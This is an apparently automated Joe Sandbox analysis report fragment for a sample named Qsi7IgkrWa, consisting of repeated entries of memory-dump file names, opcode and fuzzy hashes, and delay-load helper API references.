                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 01f22e82e65d022702433ba19fbc264999ad9b3a39583b428ed5073f76658cf2
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 01f22e82e65d022702433ba19fbc264999ad9b3a39583b428ed5073f76658cf2
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 74427a466efc2d2ebf2af4909eb778d4eac8e53eaba3fbfd73700960f2f20d95
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 74427a466efc2d2ebf2af4909eb778d4eac8e53eaba3fbfd73700960f2f20d95
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3784754bb7607d6a52d98e332bcb78446df8bc9eb03d70d086bbb7f177c8a1e5
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 3784754bb7607d6a52d98e332bcb78446df8bc9eb03d70d086bbb7f177c8a1e5
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: eb3ba2211d6a711244c0f982b43b96284078f506047c74d60f5533881e7101ce
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: eb3ba2211d6a711244c0f982b43b96284078f506047c74d60f5533881e7101ce
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 66dec3d4064ad5391d5e1bea3c58a953cbc8cc20452e0109be3934c808e85c6f
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 66dec3d4064ad5391d5e1bea3c58a953cbc8cc20452e0109be3934c808e85c6f
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 92f9821bcbedb2b83fefd61328fbe1da66be584d19248acd4747d8ba19f30722
                                        • Instruction ID: 96f932c4ff25a532fe7f0a3159a906d97338eb4827d2be2d857202b063357dff
                                        • Opcode Fuzzy Hash: 92f9821bcbedb2b83fefd61328fbe1da66be584d19248acd4747d8ba19f30722
                                        • Instruction Fuzzy Hash: 7AA011E22AA0C2BC320822022C03E3B028CC0C0B2033080EEF832EA080AC80A802083A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3a45cbf4d23fa96dee9551fcf8e024d64e722082a1cd737da07c1259eb0dc83d
                                        • Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
                                        • Opcode Fuzzy Hash: 3a45cbf4d23fa96dee9551fcf8e024d64e722082a1cd737da07c1259eb0dc83d
                                        • Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 28e8d984bf627adf6f6d4d476fe61167c3699fa44ef16fb81c5556370849f005
                                        • Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
                                        • Opcode Fuzzy Hash: 28e8d984bf627adf6f6d4d476fe61167c3699fa44ef16fb81c5556370849f005
                                        • Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 58dbbb6bdeb3183f778fe4a87495bd83b4a09c5b7f45a8b2170b60105c19ac91
                                        • Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
                                        • Opcode Fuzzy Hash: 58dbbb6bdeb3183f778fe4a87495bd83b4a09c5b7f45a8b2170b60105c19ac91
                                        • Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 66ae06f900085839ee0435061cf7f1224b517bd61dea20d9477878fae413afb6
                                        • Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
                                        • Opcode Fuzzy Hash: 66ae06f900085839ee0435061cf7f1224b517bd61dea20d9477878fae413afb6
                                        • Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 67c982b09abad7a988bf737c708342f8aecfe2910ffd710a1b05383a4faa4f88
                                        • Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
                                        • Opcode Fuzzy Hash: 67c982b09abad7a988bf737c708342f8aecfe2910ffd710a1b05383a4faa4f88
                                        • Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE580
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2230d95c01ae75c47c3ea61fbd51ef5847d8fec321663de3b2c75665862f741e
                                        • Instruction ID: e329602ec6f4dc2a643a2a2b506e7661d530f6baf622b16f9248eb64faa45ab4
                                        • Opcode Fuzzy Hash: 2230d95c01ae75c47c3ea61fbd51ef5847d8fec321663de3b2c75665862f741e
                                        • Instruction Fuzzy Hash: E3A011C22AA082FC300822A22C02E3B028CC0C0B2033088AEF82282080B88088020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE580
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: bb77093777ee02ad3bececbd2267ac61b307aaf0dcbdd625a929a2bb648e62a9
                                        • Instruction ID: e329602ec6f4dc2a643a2a2b506e7661d530f6baf622b16f9248eb64faa45ab4
                                        • Opcode Fuzzy Hash: bb77093777ee02ad3bececbd2267ac61b307aaf0dcbdd625a929a2bb648e62a9
                                        • Instruction Fuzzy Hash: E3A011C22AA082FC300822A22C02E3B028CC0C0B2033088AEF82282080B88088020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE580
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e8527d71f603502e6ca22f2276ee51d4008ba272c401b5e22f7fee48c4eb0bf8
                                        • Instruction ID: 0864f95917e00dea2bbb8e478a0da8babdb644c3242df804f18ed3bded934701
                                        • Opcode Fuzzy Hash: e8527d71f603502e6ca22f2276ee51d4008ba272c401b5e22f7fee48c4eb0bf8
                                        • Instruction Fuzzy Hash: 31A011C22AA080BC300822A22C02E3B0A8CC0E0B2233082AEF820A2080B88088020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
